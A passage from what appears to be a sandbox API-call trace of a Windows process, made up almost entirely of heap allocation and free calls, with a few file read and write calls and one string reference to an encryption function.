lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1186020 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0199.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0199.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0199.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0199.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107c020 | out: hHeap=0x970000) returned 1 [0199.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0199.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0199.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0199.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0199.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0199.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13b1020 | out: hHeap=0x970000) returned 1 [0199.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0199.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf65020 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0199.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0199.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0199.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0199.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0199.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14c1020 | out: hHeap=0x970000) returned 1 [0199.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0199.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0199.286] TranslateMessage (lpMsg=0x8cf708) returned 0 [0199.286] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0199.286] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0199.286] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0199.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0199.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0199.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0199.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0199.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0199.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0199.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf67020 [0199.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.319] WriteFile (in: hFile=0x2a0, lpBuffer=0xf67020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf67020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0199.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0199.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf67020 | out: hHeap=0x970000) returned 1 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0199.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0199.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0199.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0199.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0199.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0199.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0199.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0199.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0199.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0199.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf60020 [0199.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0199.485] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0199.494] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0199.496] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0199.499] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xb640, lpOverlapped=0x0) returned 1 [0199.515] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0199.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0199.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0199.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0199.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0199.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3be0048 [0199.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf60020 | out: hHeap=0x970000) returned 1 [0199.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0199.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0199.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0199.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0199.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0199.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x2e80330 [0199.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0199.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0199.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3be0048 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0199.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0199.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0199.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0199.596] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0199.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0199.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3be0048 [0199.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0199.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0199.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0199.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0199.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3c2b690 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0199.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0199.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0199.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 